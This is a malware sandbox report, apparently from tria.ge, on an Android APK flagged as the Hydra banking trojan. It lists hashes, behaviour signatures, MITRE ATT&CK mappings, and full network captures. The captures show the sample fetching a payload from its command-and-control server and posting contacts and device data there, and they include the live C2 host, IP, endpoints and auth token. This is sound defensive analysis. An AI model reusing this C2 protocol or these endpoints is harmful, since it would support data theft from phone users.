Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
155s -
platform
android-11_x64 -
resource
android-x64-arm64-20240910-en -
resource tags
arch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20240910-enlocale:en-usos:android-11-x64system -
submitted
16/02/2025, 22:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource
android-x86-arm-20240624-en
Behavioral task
behavioral2
Sample
2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource
android-x64-20240910-en
Behavioral task
behavioral3
Sample
2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource
android-x64-arm64-20240910-en
General
-
Target
2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
-
Size
4.6MB
-
MD5
0d7bb33151d9a98973e47fe54a885eb1
-
SHA1
0a6a1644ba3e459d1ccd949e4c55736a92c04206
-
SHA256
2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0
-
SHA512
99172dfbf2c7dbf8da541b154b5f29c1c489d5d324fcf491b3f5916a8b7602de1418e86b453aed455bdcc5f02dcc69fb371e7835f8b7e2951f14760df75524cc
-
SSDEEP
98304:VffTfxT5uY19NmMy0dL5jTS4ovGniG3ElCGYlq9VvdravEXjvC:xfxT57bzV3r60i/lhiMvPq
Malware Config
Extracted
hydra
http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Signatures
-
Hydra
Android banker and info stealer.
-
Hydra family
-
Hydra payload 2 IoCs
resource yara_rule behavioral3/files/fstream-3.dat family_hydra1 behavioral3/files/fstream-3.dat family_hydra2 -
Loads dropped Dex/Jar 1 TTPs 2 IoCs
Runs executable file dropped to the device during analysis.
ioc pid Process /data/user/0/com.dfzmabwby.wbpjhioxj/app_dex/classes.dex 4796 com.dfzmabwby.wbpjhioxj /data/user/0/com.dfzmabwby.wbpjhioxj/app_dex/classes.dex 4796 com.dfzmabwby.wbpjhioxj -
Makes use of the framework's Accessibility service 4 TTPs 2 IoCs
Retrieves information displayed on the phone screen using AccessibilityService.
description ioc Process Framework service call android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfoByAccessibilityId com.dfzmabwby.wbpjhioxj Framework service call android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByViewId com.dfzmabwby.wbpjhioxj -
Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
-
Reads the contacts stored on the device. 1 TTPs 1 IoCs
description ioc Process URI accessed for read content://com.android.contacts/contacts com.dfzmabwby.wbpjhioxj -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Makes use of the framework's foreground persistence service 1 TTPs 1 IoCs
Application may abuse the framework's foreground service to continue running in the foreground.
description ioc Process Framework service call android.app.IActivityManager.setServiceForeground com.dfzmabwby.wbpjhioxj -
Performs UI accessibility actions on behalf of the user 1 TTPs 1 IoCs
Application may abuse the accessibility service to prevent their removal.
ioc Process android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction com.dfzmabwby.wbpjhioxj -
Queries information about active data network 1 TTPs 1 IoCs
description ioc Process Framework service call android.net.IConnectivityManager.getActiveNetworkInfo com.dfzmabwby.wbpjhioxj -
Queries the mobile country code (MCC) 1 TTPs 1 IoCs
description ioc Process Framework service call com.android.internal.telephony.ITelephony.getNetworkCountryIsoForPhone com.dfzmabwby.wbpjhioxj -
Reads information about phone network operator. 1 TTPs
-
Requests uninstalling the application. 1 TTPs 1 IoCs
description ioc Process Intent action android.intent.action.DELETE com.dfzmabwby.wbpjhioxj
Processes
-
com.dfzmabwby.wbpjhioxj1⤵
- Loads dropped Dex/Jar
- Makes use of the framework's Accessibility service
- Reads the contacts stored on the device.
- Makes use of the framework's foreground persistence service
- Performs UI accessibility actions on behalf of the user
- Queries information about active data network
- Queries the mobile country code (MCC)
- Requests uninstalling the application.
PID:4796
Network
-
Remote address:1.1.1.1:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A216.58.213.14youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.178.14
-
Remote address:1.1.1.1:53Requestwww.youtube.comIN A
-
Remote address:1.1.1.1:53Requestandroid.apis.google.comIN AResponseandroid.apis.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A142.250.187.238
-
Remote address:1.1.1.1:53Request1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.orgIN AResponse1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.orgIN A62.60.226.33
-
Remote address:62.60.226.33:80RequestGET /payload HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: application/octet-stream
Content-Length: 997816
Connection: keep-alive
Last-Modified: Sat, 21 Sep 2024 12:25:51 GMT
ETag: "66eebb4f-f39b8"
Accept-Ranges: bytes
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:10 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/mirrors HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
Content-Encoding: gzip
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/lock HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 18
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:29 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 166
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 7503
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
GEThttp://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipRemote address:62.60.226.33:80RequestGET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/update HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 31
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:1.1.1.1:53Requestssl.google-analytics.comIN AResponsessl.google-analytics.comIN A216.58.213.8
-
Remote address:1.1.1.1:53Requestssl.google-analytics.comIN A
-
Remote address:1.1.1.1:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: ip-api.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 288
Access-Control-Allow-Origin: *
X-Ttl: 22
X-Rl: 43
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/contacts HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 15
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:31 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
GEThttp://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipRemote address:62.60.226.33:80RequestGET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:02:51 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
GEThttp://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipRemote address:62.60.226.33:80RequestGET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:03:12 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:31 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestGET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address:62.60.226.33:80RequestPOST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
1.5kB 40 B 2 1
-
2.6kB 6.0kB 12 10
-
2.6kB 6.1kB 11 9
-
128 B 40 B 2 1
-
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp29.0kB 1.1MB 492 677
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/payloadHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.ziphttp61.9kB 2.0MB 741 1190
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/mirrorsHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/lockHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/deviceHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/deviceHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipHTTP Response
206 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp2.6kB 1.4kB 18 13
HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/updateHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
2.3kB 8.4kB 20 16
-
1.6kB 6.3kB 11 9
-
412 B 597 B 4 3
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp2.4kB 22.6kB 25 25
HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/contactsHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.ziphttp4.6kB 109.6kB 75 82
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipHTTP Response
206 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp777 B 478 B 6 4
HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.ziphttp76.7kB 6.1MB 1394 3555
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zipHTTP Response
206 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp777 B 478 B 6 4
HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp1.7kB 21.9kB 18 21
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
62.60.226.33:80http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-loghttp2.5kB 22.0kB 24 23
HTTP Request
GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=trueHTTP Response
200HTTP Request
POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-logHTTP Response
403 -
187 B 40 B 3 1
-
519 B 7
-
128 B 40 B 2 1
-
3.8kB 12
-
122 B 303 B 2 1
DNS Request
www.youtube.com
DNS Request
www.youtube.com
DNS Response
142.250.200.14216.58.212.206142.250.180.14142.250.200.46216.58.213.14216.58.201.110142.250.187.238142.250.187.206172.217.16.238172.217.169.78216.58.204.78142.250.179.238142.250.178.14
-
69 B 109 B 1 1
DNS Request
android.apis.google.com
DNS Response
142.250.187.238
-
99 B 115 B 1 1
DNS Request
1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
DNS Response
62.60.226.33
-
140 B 86 B 2 1
DNS Request
ssl.google-analytics.com
DNS Request
ssl.google-analytics.com
DNS Response
216.58.213.8
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
MITRE ATT&CK Mobile v15
Defense Evasion
Download New Code at Runtime
1Foreground Persistence
1Impair Defenses
1Prevent Application Removal
1Indicator Removal on Host
1Uninstall Malicious Application
1Input Injection
1Discovery
Software Discovery
1Security Software Discovery
1System Network Configuration Discovery
2System Network Connections Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
974KB
MD53baeaa766ea7f31a9147208efd957c75
SHA1c701de3d0e55425394ccbf8e0967639e86f3c54e
SHA25675e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d
SHA5129f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f
-
Filesize
2.2MB
MD560af84a82afae12ff7052f9ed9cce45b
SHA11be6ba4a975b25e3ebef93be009d6536c67541d1
SHA2561491cc9fd0391b238fbaacc492791dbb45be3f78536c008f55f8dd40fa80bccf
SHA512042a86513b26c08ed60d7395bcc65f6c2eda778951c5b6d20916704613b5fc414ccfd327f5583f15e67526b73636e8b6ccfa3e1ffe573577c1637f0ff719ca06
-
Filesize
972KB
MD5c5a37df3cf85474050e8306c056b9cf7
SHA1fdc72e443f1ecbd63890c8cc532dbcd7421196c8
SHA256ae0c7db4a2be86772c697bd9859c50965e8dd14c478db1691e7ba4c9d7c83976
